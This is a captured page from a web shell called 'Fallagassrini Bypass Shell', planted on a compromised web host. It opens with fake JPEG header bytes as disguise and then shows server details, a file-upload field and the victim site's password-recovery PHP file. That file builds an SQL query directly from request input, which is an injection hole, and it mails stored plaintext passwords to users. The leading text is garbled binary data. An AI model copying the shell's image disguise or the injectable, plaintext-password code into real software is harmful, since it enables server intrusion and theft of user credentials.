JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/mail/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/mail/forgot_mail.php

<?php
session_start();
include ('../All_Posters/sql1.php');
#####################################
# Include PHP Mailer Class
#####################################
require("class.phpmailer.php");
?>
<?php
#####################################
# Function to send email
#####################################
function sendEmail ($fromName, $fromEmail, $toEmail, $subject, $emailBody) {
	$mail = new PHPMailer();
	$mail->FromName = $fromName;
	$mail->From = $fromEmail;
	$mail->AddAddress("$toEmail");
		
	$mail->Subject = $subject;
	$mail->Body = $emailBody;
	$mail->isHTML(true);
	$mail->WordWrap = 150;
		
	if(!$mail->Send()) {
		return false;
	} else {
		return true;
	}
}

#####################################
# Function to Read a file 
# and store all data into a variable
#####################################
function readTemplateFile($FileName) {
		$fp = fopen($FileName,"r") or exit("Unable to open File ".$FileName);
		$str = "";
		while(!feof($fp)) {
			$str .= fread($fp,1024);
		}	
		return $str;
}
?>
<?php
#####################################
# Finally send email
#####################################
	
	//Data to be sent (Ideally fetched from Database)
	//$NameOfUser = $_REQUEST['name'];
	$Username = $_REQUEST['username'];
	//echo $Username ;
	 $setuser= mysql_query("select * from tbl_register where email='".$Username."'");
	// $sql_num_test1 = $setuser->num_rows();
        $rowuser=mysql_fetch_array($setuser);
	
	
	 //$setuser=mysql_query("select * from tbl_register where emailid='".$Username."'");
	 //$rowuser=mysql_fetch_array($setuser);
	 
	 $message="your password is";
			  $password=$rowuser['password'];
              $msg=$message."<br>".$password;
	
	$name=$rowuser['fname'];
	//$password =$_REQUEST['password'];
	//$UserEmail = "a.amitoj@gmail.com";
	//$UserEmail = $_REQUEST['email'];
	//Send email to user containing username and password
	//Read Template File 
	$emailBody = readTemplateFile("forgot_template.html");
			
	//Replace all the variables in template file
	$emailBody = str_replace("#name#",$name,$emailBody);
	//$emailBody = str_replace("#username#",$Username,$emailBody);
	$emailBody = str_replace("#password#",$msg,$emailBody);
	//$emailBody = str_replace("#link#",$password,$emailBody);
			
	//Send email
	$emailStatus = sendEmail ("All Posters", "info@thehero.com", $Username, "Password Recovery", $emailBody);
	
	//If email function return false
	if ($emailStatus != 1) {
		echo "An error occured while sending email. Please try again later.";
	} else {
		echo "<script type='text/javascript'>window.location='../login?getpassword=1'</script>";
	}
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net